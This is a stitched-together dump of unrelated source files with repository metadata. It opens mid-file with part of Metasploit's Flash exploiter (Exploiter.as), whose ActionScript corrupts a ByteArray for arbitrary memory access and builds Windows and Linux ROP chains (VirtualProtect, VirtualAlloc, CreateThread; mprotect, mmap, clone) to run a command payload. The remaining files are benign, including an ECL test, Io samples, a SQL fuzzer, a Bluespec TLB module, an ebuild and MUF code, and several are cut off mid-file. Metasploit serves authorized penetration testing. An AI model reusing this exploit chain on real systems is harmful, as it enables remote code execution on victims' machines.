ev.read(byte_array_object + 0x40) buffer = ev.read(buffer_object + 8) } vtable = ev.read(main) stack_address = ev.read(stack_object + 0x18) payload_address = ev.read(payload_space_object + 0x18) stub_address = ev.read(stub_space_object + 0x18) magic_object = ev.read(ev.read(ev.read(ev.read(magic + 8) + 0x14) + 4) + 0xb0) magic_table = ev.read(magic_object) magic_arg0 = ev.read(magic + 0x1c) magic_arg1 = ev.read(magic + 0x20) } private function corrupt_byte_array():void { Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform) if (platform == "linux") { ev.write(buffer_object + 0x1c) // *array ev.write(buffer_object + 0x20, 0xffffffff) // capacity } else if (platform == "win") { ev.write(buffer_object + 8) // *array ev.write(buffer_object + 16, 0xffffffff) // capacity } eba.lets_ready() } private function restore_byte_array():void { Logger.log("[*] Exploiter - restore_byte_array(): " + platform) if (platform == "linux") { ev.write(buffer_object + 0x1c, buffer) // *array ev.write(buffer_object + 0x20, 1024) // capacity } else if (platform == "win") { ev.write(buffer_object + 8, buffer) // *array ev.write(buffer_object + 16, 1024) // capacity } eba.set_length(eba.original_length) } private function do_rop():void { Logger.log("[*] Exploiter - do_rop()") if (platform == "linux") { do_rop_linux() } else if (platform == "win") { do_rop_windows() } else { return } } private function do_rop_windows():void { Logger.log("[*] Exploiter - do_rop_windows()") var pe:PE = new PE(eba) var flash:uint = pe.base(vtable) var winmm:uint = pe.module("winmm.dll", flash) var kernel32:uint = pe.module("kernel32.dll", winmm) var ntdll:uint = pe.module("ntdll.dll", kernel32) var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32) var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32) var createthread:uint = pe.procedure("CreateThread", kernel32) var memcpy:uint = pe.procedure("memcpy", ntdll) var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash) var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash) var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll) // Continuation of execution eba.write(buffer + 0x10, "\xb8", false); eba.write(0, magic_table, false) // mov eax, vtable eba.write(0, "\xbb", false); eba.write(0, magic_object, false) // mov ebx, main eba.write(0, "\x89\x03", false) // mov [ebx], eax eba.write(0, "\x87\xf4\xc2\x10\x00", false) // xchg esi, esp # ret 0x10 // Put the payload (command) in memory eba.write(payload_address + 8, payload, true); // payload // Put the fake stack on memory eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot eba.write(0, virtualprotect) // VirtualProtect eba.write(0, virtualalloc) eba.write(0, buffer + 0x10) eba.write(0, 0x1000) eba.write(0, 0x40) eba.write(0, buffer + 0x8) // Writable address (4 bytes) // VirtualAlloc eba.write(0, memcpy) eba.write(0, 0x7f6e0000) eba.write(0, 0x4000) eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE // memcpy eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't eba.write(0, 0x7f6e0000) eba.write(0, payload_address + 8) eba.write(0, payload.length) // CreateThread eba.write(0, createthread) eba.write(0, buffer + 0x10) // return to fix things eba.write(0, 0) eba.write(0, 0) eba.write(0, 0x7f6e0000) eba.write(0, 0) eba.write(0, 0) eba.write(0, 0) for (var i:uint; i < 0x100; i++) { eba.write(stack_address + 8 + (i * 4), eba.read(magic_table - 0x80 + i * 4)) } // VirtualProtect the stub with a *reliable* stackpivot eba.write(stack_address + 8 + 0x80 + 28, virtualprotect) eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored) eba.write(magic + 0x1c, stub_address) eba.write(magic + 0x20, 0x10) var args:Array = new Array(0x41) Magic.call.apply(null, args); // Call to our stackpivot and init the rop chain eba.write(stack_address + 8 + 0x80 + 28, stub_address + 8) eba.write(magic_object, stack_address + 8 + 0x80); // overwrite vtable (needs to be restored) eba.write(magic + 0x1c, stack_address + 0x18000) Magic.call.apply(null, null); eba.write(magic_object, magic_table); eba.write(magic + 0x1c, magic_arg0) eba.write(magic + 0x20, magic_arg1) } private function do_rop_linux():void { Logger.log("[*] Exploiter - do_rop_linux()") var flash:Elf = new Elf(eba, vtable) var feof:uint = flash.external_symbol('feof') var libc:Elf = new Elf(eba, feof) var popen:uint = libc.symbol("popen") var mprotect:uint = libc.symbol("mprotect") var mmap:uint = libc.symbol("mmap") var clone:uint = libc.symbol("clone") var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff) var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff) var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff) // Continuation of execution // 1) Recover original vtable eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main eba.write(0, "\x89\x03", false) // mov [ebx], eax // 2) Recover original stack eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi // my_memcpy eba.write(buffer + 0x60, "\x56", false) // push esi eba.write(0, "\x57", false) // push edi eba.write(0, "\x51", false) // push ecx eba.write(0, "\x8B\x7C\x24\x10", false) // mov edi,[esp+0x10] eba.write(0, "\x8B\x74\x24\x14", false) // mov esi,[esp+0x14] eba.write(0, "\x8B\x4C\x24\x18", false) // mov ecx,[esp+0x18] eba.write(0, "\xF3\xA4", false) // rep movsb eba.write(0, "\x59", false) // pop ecx eba.write(0, "\x5f", false) // pop edi eba.write(0, "\x5e", false) // pop esi eba.write(0, "\xc3", false) // ret // Put the popen parameters in memory eba.write(payload_address + 0x8, payload, true) // false // Put the fake stack/vtable on memory eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi eba.write(0, addesp2cret) //second pivot to preserver stack_address + 0x18024 // Return to mprotect() eba.write(stack_address + 0x18034, mprotect) // Return to stackpivot (jmp over mprotect parameters) eba.write(0, addesp2cret) // mprotect() arguments eba.write(0, buffer) // addr eba.write(0, 0x1000) // size eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC // Return to mmap() eba.write(stack_address + 0x18068, mmap) // Return to stackpivot (jmp over mmap parameters) eba.write(0, addesp2cret) // mmap() code segment arguments eba.write(0, 0x70000000) // 0x70000000 eba.write(0, 0x4000) // size eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS eba.write(0, 0xffffffff) // filedes eba.write(0, 0) // offset // Return to mmap() eba.write(stack_address + 0x1809c, mmap) // Return to stackpivot (jmp over mmap parameters) eba.write(0, addesp2cret) // mmap() stack segment arguments eba.write(0, 0x70008000) // NULL eba.write(0, 0x10000) // size eba.write(0, 0x7) // PROT_READ | PROT_WRITE | PROT_EXEC eba.write(0, 0x22) // MAP_PRIVATE | MAP_ANONYMOUS eba.write(0, -1) // filedes eba.write(0, 0) // offset // Return to memcpy() eba.write(stack_address + 0x180d0, buffer + 0x60) // Return to stackpivot (jmp over memcpy parameters) eba.write(0, addesp2cret) // memcpy() parameters eba.write(0, 0x70000000) eba.write(0, payload_address + 0x8) eba.write(0, payload.length) // Return to clone() eba.write(stack_address + 0x18104, clone) // Return to CoE (fix stack and object vtable) eba.write(0, buffer + 0x10) // clone() arguments eba.write(0, 0x70000000) // code eba.write(0, 0x7000bff0) // stack eba.write(0, 0x00000100) // flags CLONE_VM eba.write(0, 0) // args //call DWORD PTR [eax+0x24] //EAX: 0x41414141 ('AAAA') //EDI: 0xad857088 ("AAAA\377") eba.write(main, stack_address + 0x18000) exploit.hasOwnProperty('msf') } private function cleanup():void { Logger.log("[*] Exploiter - cleanup()") spray = null stack = null payload_space = null eba = null ev = null exploit = null System.pauseForGCIfCollectionImminent(0) } } }
ActionScript
1
OsmanDere/metasploit-framework
external/source/flash_exploiter/Exploiter.as
[ "BSD-2-Clause", "BSD-3-Clause" ]
/*############################################################################## HPCC SYSTEMS software Copyright (C) 2012 HPCC Systems®. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ############################################################################## */ string makeString(unsigned max) := BEGINC++ void * temp = rtlMalloc(max); memset(temp, 'x', max); __lenResult = max; __result = (char *)temp; ENDC++; output(makeString(random()%4096+1));
ECL
4
miguelvazq/HPCC-Platform
ecl/regress/random2.ecl
[ "Apache-2.0" ]
#!/usr/bin/env io bottle := method(i, if(i==0, return "no more bottles of beer") if(i==1, return "1 bottle of beer") return i asString .. " bottles of beer" ) for(i, 99, 1, -1, write(bottle(i), " on the wall, ", bottle(i), ",\n") write("take one down, pass it around,\n") write(bottle(i - 1), " on the wall.\n\n") )
Io
4
akluth/io
samples/misc/BottlesOfBeer.io
[ "BSD-3-Clause" ]
/* * Copyright (c) 2021, Luke Wilde <[email protected]> * * SPDX-License-Identifier: BSD-2-Clause */ #include <LibSQL/AST/Lexer.h> #include <LibSQL/AST/Parser.h> #include <stdio.h> extern "C" int LLVMFuzzerTestOneInput(const uint8_t* data, size_t size) { auto parser = SQL::AST::Parser(SQL::AST::Lexer({ data, size })); [[maybe_unused]] auto statement = parser.next_statement(); return 0; }
C++
3
r00ster91/serenity
Meta/Lagom/Fuzzers/FuzzSQLParser.cpp
[ "BSD-2-Clause" ]
int sayHello1 (string str);
D
1
kira78/meson
test cases/d/7 multilib/say1.di
[ "Apache-2.0" ]
#!/bin/sh cores=$(nproc --all) echo Number of cores: $cores echo Compiling... ./v -cc clang -o cmd/tools/fuzz/map_fuzz cmd/tools/fuzz/map_fuzz.v -prod -cflags "-fsanitize=memory" echo Fuzzing: while true do for ((i=1;i<=cores;++i)) do sleep 0.001 ./cmd/tools/fuzz/map_fuzz & done wait done
Shell
3
gamemaker1/v
cmd/tools/fuzz/fuzz.sh
[ "MIT" ]
RwSimpleProjectLoadComponentV2 { #name : 'Gemstone32x', #condition : 'gs3.2.x', #projectNames : [ ], #componentNames : [ ], #packageNames : [ 'FileSystem-Core-32x' ], #comment : 'FileSystemGs component. For now all packages are expected to be loaded into Globals by SystemUser' }
STON
3
GemTalk/Rowan
platforms/gemstone/projects/FileSystemGs/rowan/componentsV2/Gemstone32x.ston
[ "MIT" ]
if(cell?(:reload_count_x), Ground reload_count_x++, Ground reload_count_x = 0)
Ioke
0
olabini/ioke
test/reload_x.ik
[ "ICU", "MIT" ]
doseq x xs y ys println x y
Cirru
2
Cirru/cirru.org
examples/doseq.cirru
[ "MIT" ]
#!/usr/bin/env io "Hello world!" println // Or writeln("Hello world (again)")
Io
3
akluth/io
samples/misc/HelloWorld.io
[ "BSD-3-Clause" ]
from .validation import check_random_state def _init_arpack_v0(size, random_state): """Initialize the starting vector for iteration in ARPACK functions. Initialize a ndarray with values sampled from the uniform distribution on [-1, 1]. This initialization model has been chosen to be consistent with the ARPACK one as another initialization can lead to convergence issues. Parameters ---------- size : int The size of the eigenvalue vector to be initialized. random_state : int, RandomState instance or None, default=None The seed of the pseudo random number generator used to generate a uniform distribution. If int, random_state is the seed used by the random number generator; If RandomState instance, random_state is the random number generator; If None, the random number generator is the RandomState instance used by `np.random`. Returns ------- v0 : ndarray of shape (size,) The initialized vector. """ random_state = check_random_state(random_state) v0 = random_state.uniform(-1, 1, size) return v0
Python
5
emarkou/scikit-learn
sklearn/utils/_arpack.py
[ "BSD-3-Clause" ]
' canvasbeginpaint.bmx Strict Import MaxGui.Drivers AppTitle = "Canvas Painter Example" Local window:TGadget = CreateWindow(AppTitle,50,50,200,200) ' create a canvas that occupies entire window client area Local canvas:TGadget = CreateCanvas(0,0,ClientWidth(window),ClientHeight(window),window) SetGadgetLayout canvas, EDGE_ALIGNED, EDGE_ALIGNED, EDGE_ALIGNED, EDGE_ALIGNED ' create a timer as our single event source Local timer:TTimer = CreateTimer(50) Repeat Select WaitEvent() Case EVENT_WINDOWCLOSE, EVENT_APPTERMINATE End Default CanvasBeginPaint(canvas) SetClsColor( 0, 255*Sin(MilliSecs()/5.0), 0 ) Cls() Flip() EndSelect Forever Function CanvasBeginPaint(canvas:TGadget) SetGraphics CanvasGraphics(canvas) SetVirtualResolution ClientWidth(canvas), ClientHeight(canvas) SetViewport 0, 0, ClientWidth(canvas), ClientHeight(canvas) End Function
BlitzMax
4
jabdoa2/blitzmax
mod/maxgui.mod/maxgui.mod/doc/canvasbeginpaint.bmx
[ "Zlib" ]
_in 1 zeros 0 0 96 4 clock 8 _in _out "ps.scm" ps 0 8 _out ftsum dup
SourcePawn
1
aleatoricforest/Sporth
ugens/polysporth/examples/10_noteoff.sp
[ "MIT" ]
#content .container h2 Search for: #{{@query}} p== @user.name == render 'slimmer'
Slim
3
nikolalsvk/brakeman
test/apps/rails4_with_engines/engines/user_removal/app/views/users/slimming.html.slim
[ "MIT" ]
[deps] BenchmarkTools = "6e4b80f9-dd63-53aa-95a3-0cdb28fa8baf" PkgBenchmark = "32113eaa-f34f-5b0d-bd6c-c81e245fc73d" Random = "9a3f8284-a2c9-5f02-9a11-845980a1fd5c" StableRNGs = "860ef19b-820b-49d6-a774-d7a799459cd3" TOML = "fa267f1f-6049-4f14-aa54-33bafae1ed76"
TOML
1
vanillajonathan/julia
stdlib/TOML/benchmark/Project.toml
[ "Zlib" ]
#define UPSAMPLE_FORMAT unorm float4 #include "upsample_bilateral_float4CS.hlsl"
HLSL
1
rohankumardubey/WickedEngine
WickedEngine/shaders/upsample_bilateral_unorm4CS.hlsl
[ "MIT" ]
<hello>world</hello>
HTML+ERB
0
mdesantis/rails
actionpack/test/fixtures/old_content_type/render_default_content_types_for_respond_to.xml.erb
[ "MIT" ]
<div class="form-select-menu"> <button class="form-select-button" (click)="toggleOptions()"> <strong>{{label}}</strong><span *ngIf="showSymbol" class="symbol {{selected?.value}}"></span>{{selected?.title}} </button> <ul class="form-select-dropdown" *ngIf="showOptions"> <li *ngFor="let option of options; index as i" [class.selected]="option === selected" role="button" tabindex="0" (click)="select(option, i)" (keydown.enter)="select(option, i)" (keydown.space)="select(option, i); $event.preventDefault()"> <span *ngIf="showSymbol" class="symbol {{option.value}}"></span>{{option.title}} </li> </ul> </div>
HTML
4
KevLeong/rxjs
docs_app/src/app/shared/select/select.component.html
[ "Apache-2.0" ]
// Copyright (c) 2017 Massachusetts Institute of Technology // // Permission is hereby granted, free of charge, to any person // obtaining a copy of this software and associated documentation // files (the "Software"), to deal in the Software without // restriction, including without limitation the rights to use, copy, // modify, merge, publish, distribute, sublicense, and/or sell copies // of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be // included in all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, // EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF // MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND // NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS // BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN // ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN // CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE // SOFTWARE. import Vector::*; import Ehr::*; import Types::*; import ProcTypes::*; import TlbTypes::*; typedef struct { Bool hit; indexT index; // hit index, for later update LRU info TlbEntry entry; // hit entry } FullAssocTlbResp#(type indexT) deriving(Bits, Eq, FShow); // flush preempts addEntry and (translate + updateRepByHit) // addEntry C (translate + updateRepByHit) // This avoids bypass from addEntry to translate, and avoids races on LRU bits // translate CF updateRepByHit. // updateRepByHit is separted from translate to avoid making translate an // actionvalue method which may create potential guard lifting problems. interface FullAssocTlb#(numeric type n); method Action flush; method FullAssocTlbResp#(Bit#(TLog#(n))) translate(Vpn vpn, Asid asid); method Action updateRepByHit(Bit#(TLog#(n)) index); // update replacement info when hit method Action addEntry(TlbEntry x); endinterface module mkFullAssocTlb#( Bool randRep // introduce randomness in bit LRU replacement )(FullAssocTlb#(tlbSz)) provisos( Add#(1, a__, tlbSz), Alias#(tlbIdxT, Bit#(TLog#(tlbSz))) ); Vector#(tlbSz, Reg#(Bool)) validVec <- replicateM(mkReg(False)); Vector#(tlbSz, Reg#(TlbEntry)) entryVec <- replicateM(mkRegU); // bit-LRU replacement. To reduce cycle time, we update LRU bits in the // next cycle after we touch an entry. However, when we have two // consecutive cycles inserting new entries, the latter insertion should // see the updates to LRU bits made by the former insertion; otherwise the // latter will insert to the same slot as the former one. Ehr#(2, Bit#(tlbSz)) lruBit <- mkEhr(0); Reg#(Bit#(tlbSz)) lruBit_upd = lruBit[0]; // write Reg#(Bit#(tlbSz)) lruBit_add = lruBit[1]; // read // reg as 1 cycle delay for update LRU Ehr#(2, Maybe#(tlbIdxT)) updRepIdx <- mkEhr(Invalid); Reg#(Maybe#(tlbIdxT)) updRepIdx_deq = updRepIdx[0]; Reg#(Maybe#(tlbIdxT)) updRepIdx_enq = updRepIdx[1]; // randomly choose an LRU idx at replacement time Reg#(tlbIdxT) randIdx <- mkReg(0); if(randRep) begin rule incRandIdx; randIdx <= randIdx + 1; endrule end // fire signal for flush PulseWire flushEn <- mkPulseWire; rule doUpdateRep(!flushEn &&& updRepIdx_deq matches tagged Valid .idx); updRepIdx_deq <= Invalid; // update LRU bits Bit#(tlbSz) val = lruBit_upd; val[idx] = 1; if(val == maxBound) begin val = 0; val[idx] = 1; end lruBit_upd <= val; endrule // function to match TLB entry method Action flush; writeVReg(validVec, replicate(False)); // also reset LRU bits lruBit_upd <= 0; updRepIdx_deq <= Invalid; // record fire signal flushEn.send; endmethod method FullAssocTlbResp#(tlbIdxT) translate(Vpn vpn, Asid asid) if(!flushEn); // find the matching entry function Bool isMatch(tlbIdxT i); TlbEntry entry = entryVec[i]; Bool asidMatch = entry.asid == asid || entry.pteType.global; Bool vpnMatch = getMaskedVpn(vpn, entry.level) == entry.vpn; return validVec[i] && asidMatch && vpnMatch; endfunction Vector#(tlbSz, tlbIdxT) idxVec = genWith(fromInteger); if(find(isMatch, idxVec) matches tagged Valid .idx) begin // hit a TLB entry, get its content return FullAssocTlbResp { hit: True, index: idx, entry: entryVec[idx] }; end else begin // miss return FullAssocTlbResp { hit: False, index: ?, entry: ? }; end endmethod method Action updateRepByHit(tlbIdxT index) if(!flushEn && updRepIdx_enq == Invalid); updRepIdx_enq <= Valid (index); endmethod method Action addEntry(TlbEntry x) if(!flushEn && updRepIdx_enq == Invalid); // check ppn and vpn lower bits are 0 for super pages doAssert(x.ppn == getMaskedPpn(x.ppn, x.level), "ppn lower bits not 0"); doAssert(x.vpn == getMaskedVpn(x.vpn, x.level), "vpn lower bits not 0"); // first check if the entry already exists in TLB, this can happen // because we may have multiple misses on the same TLB entry. Since // lower bits of ppn/vpn of super pages in TLB should have been zeroed, // we can directly compare the full addr. function Bool sameEntry(tlbIdxT i); let en = entryVec[i]; Bool same_page = en.vpn == x.vpn && en.level == x.level && en.asid == x.asid && en.pteType.global == x.pteType.global; return validVec[i] && same_page; endfunction Vector#(tlbSz, tlbIdxT) idxVec = genWith(fromInteger); if(any(sameEntry, idxVec)) begin // entry exists, update LRU //updRepIdx_enq <= Valid (idx); // FIXME: when I try to use find() to find the index, the // compilation just explodes... noAction; end else begin // find a slot for this translation // Since TLB is read-only cache, we can silently evict tlbIdxT addIdx; if(findIndex( \== (False) , readVReg(validVec) ) matches tagged Valid .idx) begin // get empty slot addIdx = pack(idx); end else begin // find LRU slot (lruBit[i] = 0 means i is LRU slot) Vector#(tlbSz, Bool) isLRU = unpack(~lruBit_add); if(randRep && isLRU[randIdx]) begin addIdx = randIdx; end else if(findIndex(id, isLRU) matches tagged Valid .idx) begin addIdx = pack(idx); end else begin addIdx = 0; // this is actually impossible doAssert(False, "must have at least 1 LRU slot"); end end // update slot validVec[addIdx] <= True; entryVec[addIdx] <= x; // update LRU bits updRepIdx_enq <= Valid (addIdx); end endmethod endmodule
Bluespec
5
faddat/Flute
src_Core/Near_Mem_VM_WB_L1_L2/src_LLCache/procs/lib/FullAssocTlb.bsv
[ "Apache-2.0" ]
# Copyright 1999-2015 Gentoo Foundation # Distributed under the terms of the GNU General Public License v2 # $Header: $ EAPI=4 inherit pax-utils versionator DESCRIPTION="Ebuild for static binary build of nodejs" HOMEPAGE="http://nodejs.org" SRC_URI="http://nodejs.org/dist/v${PV}/node-v${PV}-linux-x64.tar.gz" LICENSE="Apache-1.1 Apache-2.0 BSD BSD-2 MIT" SLOT="$(get_version_component_range 1-3)" KEYWORDS="~amd64" IUSE="" DEPEND="app-admin/eselect-nodejs" RDEPEND="${DEPEND}" S="${WORKDIR}/node-v${PV}-linux-x64" INSTALL_DIR="/opt/nodejs/${PV}" src_install() { # Installation of node modules # doins is not used here since it uses a very # basic install command which doen't keep binary permissions # mkdir is needed as copy doesn't directly deal with the # various ebuild helper functions mkdir -p "${D}/${INSTALL_DIR}" cp -a "${S}/lib" "${D}/${INSTALL_DIR}/" # Install of node header files with symlinks from # source node ebuild insinto ${INSTALL_DIR}/include doins -r include/node dodir ${INSTALL_DIR}/include/node/deps/{v8,uv} dosym . ${INSTALL_DIR}/include/node/src for var in deps/{uv,v8}/include; do dosym ../.. ${INSTALL_DIR}/include/node/${var} done # Man install insinto ${INSTALL_DIR}/ doins -r share # Node needs pax marking into ${INSTALL_DIR}/ pax-mark -m bin/node dobin bin/node dosym ${INSTALL_DIR}/bin/node ${INSTALL_DIR}/bin/node-waf # Symlink for npm + execute permissions fperms 0755 ${INSTALL_DIR}/lib/node_modules/npm/bin/npm-cli.js dosym ${INSTALL_DIR}/lib/node_modules/npm/bin/npm-cli.js \ ${INSTALL_DIR}/bin/npm }
Gentoo Ebuild
4
tobychin/ey-cloud-recipes
cookbooks/custom_nodejs/files/default/nodejs-bin-generic.ebuild
[ "MIT" ]
/* * * Copyright 2017 gRPC authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * */ #include <grpc/grpc.h> #include <grpc/support/log.h> #include "src/core/lib/transport/transport.h" #include "test/core/util/test_config.h" static void do_nothing(void* /*arg*/, grpc_error_handle /*error*/) {} int main(int argc, char** argv) { grpc::testing::TestEnvironment env(argc, argv); grpc_init(); uint8_t buffer[] = "abc123"; grpc_stream_refcount r; GRPC_STREAM_REF_INIT(&r, 1, do_nothing, nullptr, "test"); grpc_slice slice = grpc_slice_from_stream_owned_buffer(&r, buffer, sizeof(buffer)); GPR_ASSERT(GRPC_SLICE_START_PTR(slice) == buffer); GPR_ASSERT(GRPC_SLICE_LENGTH(slice) == sizeof(buffer)); grpc_slice_unref(slice); grpc_shutdown(); return 0; }
C++
4
bostikforever/grpc
test/core/transport/stream_owned_slice_test.cc
[ "Apache-2.0" ]
( Generated from test_statement_switch_in.muv by the MUV compiler. ) ( https://github.com/revarbat/muv ) : _complex_match[ _v1 _v2 -- ret ] _v1 @ number? dup if pop _v2 @ number? then if _v1 @ _v2 @ = exit then _v1 @ string? dup if pop _v2 @ int? then if _v1 @ _v2 @ intostr strcmp not exit then _v1 @ "%?" fmtstring _v2 @ "%?" fmtstring strcmp not if 0 exit then _v1 @ string? if _v1 @ tolower _v2 @ tolower strcmp not exit then 0 ; : _main[ _arg -- ret ] var _i var _a 2 _i ! 0 begin pop (switch) _i @ dup 1 = if "One." me @ swap notify break then dup 2 = if "Two." me @ swap notify break then dup 3 = if "Three." me @ swap notify break then break repeat pop 0 begin pop (switch) _arg @ dup "greet" strcmp not if "Hello." me @ swap notify break then dup "who" strcmp not if "I'm called MUV." me @ swap notify break then dup "what" strcmp not if "I'm a nicer language to use than MUF." me @ swap notify break then (default) "I don't understand." me @ swap notify break repeat pop 0 begin pop (switch) _arg @ dup "fee" _complex_match if "Fee selected!" me @ swap notify break then dup 1 _complex_match if "One selected!" me @ swap notify break then dup "" _complex_match if "None selected!" me @ swap notify break then break repeat pop "foo" _a ! 0 begin pop (switch) 42 dup 99 > if "A" me @ swap notify break then dup 50 > if "B" me @ swap notify break then dup 25 > if "C" me @ swap notify break then dup 10 > if "D" me @ swap notify break then break repeat pop 0 ; : __start "me" match me ! me @ location loc ! trig trigger ! _main ;
MUF
4
revarbat/muv
tests/test_statement_switch_cmp.muf
[ "BSD-2-Clause" ]
248 SOAR_ID 0 SOAR_ID 1 SOAR_ID 2 SOAR_ID 3 SOAR_ID 4 ENUMERATION 5 1 state ENUMERATION 6 1 nil ENUMERATION 7 1 mnl-soar ENUMERATION 8 1 initialize-rosie SOAR_ID 9 ENUMERATION 10 1 next-word SOAR_ID 11 ENUMERATION 12 1 restart-parse SOAR_ID 13 STRING 14 ENUMERATION 15 1 nil SOAR_ID 17 SOAR_ID 16 ENUMERATION 19 1 yes STRING 18 STRING 21 ENUMERATION 20 1 mnl-soar SOAR_ID 23 SOAR_ID 22 ENUMERATION 25 1 comprehend-word SOAR_ID 24 ENUMERATION 27 1 nil ENUMERATION 26 1 true SOAR_ID 29 ENUMERATION 28 1 nil SOAR_ID 31 SOAR_ID 30 SOAR_ID 34 ENUMERATION 35 1 state SOAR_ID 32 INT_RANGE 33 -2147483648 2147483647 SOAR_ID 38 SOAR_ID 39 ENUMERATION 36 1 comprehend-word ENUMERATION 37 1 smem-lexical-retrieval STRING 42 SOAR_ID 43 SOAR_ID 40 SOAR_ID 41 SOAR_ID 46 ENUMERATION 47 1 retrieve-semantic-substructure SOAR_ID 44 SOAR_ID 45 ENUMERATION 51 1 copy-lexical-to-receiver SOAR_ID 50 ENUMERATION 49 1 finish-comprehend SOAR_ID 48 SOAR_ID 55 SOAR_ID 54 ENUMERATION 53 1 join-assigner-receiver SOAR_ID 52 SOAR_ID 59 SOAR_ID 58 ENUMERATION 57 1 create-receiver ENUMERATION 56 1 merge ENUMERATION 63 1 termination-processing ENUMERATION 62 1 state SOAR_ID 61 ENUMERATION 60 1 termination-processing ENUMERATION 68 1 check-failure SOAR_ID 69 SOAR_ID 70 ENUMERATION 71 1 select-semantic-soar-operator ENUMERATION 64 1 check-not-merged-assigners SOAR_ID 65 ENUMERATION 66 1 check-not-merged-receivers SOAR_ID 67 SOAR_ID 76 ENUMERATION 77 1 ground-object ENUMERATION 78 1 print-semantics SOAR_ID 79 SOAR_ID 72 ENUMERATION 73 1 select-semantic-direct-object ENUMERATION 74 1 retrieve-assigner-constraints SOAR_ID 75 SOAR_ID 85 ENUMERATION 84 1 create-assigner ENUMERATION 87 1 no-viable-groundings--restart-parse SOAR_ID 86 ENUMERATION 81 1 ground-new-constraint SOAR_ID 80 ENUMERATION 83 1 remove-stale-receivers SOAR_ID 82 ENUMERATION 93 1 state SOAR_ID 92 ENUMERATION 95 1 evaluate-operator ENUMERATION 94 1 Impasse__Operator_Tie ENUMERATION 89 1 process-phrase-end SOAR_ID 88 ENUMERATION 91 1 process-missing-assigner SOAR_ID 90 ENUMERATION 102 1 count-referents SOAR_ID 103 ENUMERATION 100 1 evaluate SOAR_ID 101 ENUMERATION 98 1 state ENUMERATION 99 1 evaluate-operator SOAR_ID 96 SOAR_ID 97 SOAR_ID 110 ENUMERATION 111 1 next-sentence ENUMERATION 108 1 process-preset-semantic-structure SOAR_ID 109 ENUMERATION 106 1 retrieve-constraint-substructure SOAR_ID 107 ENUMERATION 104 1 compare-count-differences SOAR_ID 105 ENUMERATION 119 1 state SOAR_ID 118 ENUMERATION 117 1 smem-words SOAR_ID 116 ENUMERATION 115 1 process-semantics SOAR_ID 114 ENUMERATION 113 1 halt SOAR_ID 112 ENUMERATION 127 1 print-semantics ENUMERATION 126 1 state SOAR_ID 125 SOAR_ID 124 ENUMERATION 123 1 process-new-word SOAR_ID 122 ENUMERATION 121 1 conjunctives ENUMERATION 120 1 smem-words SOAR_ID 137 ENUMERATION 136 1 print-field-value SOAR_ID 139 ENUMERATION 138 1 finished-print-sementics ENUMERATION 141 1 comprehension SOAR_ID 140 ENUMERATION 143 1 state SOAR_ID 142 SOAR_ID 129 ENUMERATION 128 1 print-actor SOAR_ID 131 ENUMERATION 130 1 print-event SOAR_ID 133 ENUMERATION 132 1 print-location SOAR_ID 135 ENUMERATION 134 1 print-sentence ENUMERATION 152 1 index-object-properties SOAR_ID 153 ENUMERATION 154 1 tested-referent SOAR_ID 155 SOAR_ID 156 ENUMERATION 157 1 state ENUMERATION 158 2 index-object-properties comprehension ENUMERATION 159 1 satisfy-property-constraint ENUMERATION 144 1 comprehend ENUMERATION 145 1 d SOAR_ID 146 SOAR_ID 147 ENUMERATION 148 1 state ENUMERATION 149 1 ground-referent ENUMERATION 150 1 index-scene-objects SOAR_ID 151 ENUMERATION 171 1 state SOAR_ID 170 SOAR_ID 169 ENUMERATION 168 1 index-object-scene-relation ENUMERATION 175 1 satisfy-relation-constraint SOAR_ID 174 ENUMERATION 173 1 find-relations ENUMERATION 172 1 index-object-scene-relation ENUMERATION 163 1 index-scene-objects ENUMERATION 162 1 state SOAR_ID 161 SOAR_ID 160 SOAR_ID 167 ENUMERATION 166 1 satisfy-relation-constraint SOAR_ID 165 ENUMERATION 164 1 find-relations ENUMERATION 186 1 smem-store ENUMERATION 187 2 detect-unlikely-property-unknown-adjective 